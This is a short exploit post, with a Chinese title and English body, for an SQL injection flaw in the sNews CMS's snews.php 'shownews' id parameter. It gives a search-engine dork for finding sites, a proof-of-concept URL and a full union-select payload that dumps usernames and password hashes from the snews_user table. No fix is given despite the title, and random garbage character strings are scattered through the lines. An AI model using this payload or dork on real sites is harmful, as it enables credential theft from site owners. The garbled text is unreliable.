CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
作者: By onestree
- {- u% l1 q. L下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
9 H7 x" r$ t% D- T6 P0 ?关键词: inurl:"tanyakan pada rumput yang bergoyang"


*************************************************************
$ v  [" e' w+ r# Z* q1 o/ {
( o. Y2 {! \' e6 aSQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

) n- _" }, p1 M& F- n示例
. Q4 W3 V. e- ?
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


致谢:
6 r" a4 h8 M# _8 C- _
! a$ H& t0 R3 u# b/ e  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
, Y# N0 c$ _3 A) ^9 L7 b: x) Y          indonesiancoder - moeslimh4x0r - go-coder
/ e- f% ]# q; S4 i7 P
" G4 g7 L" ^3 @spesial my hunny :*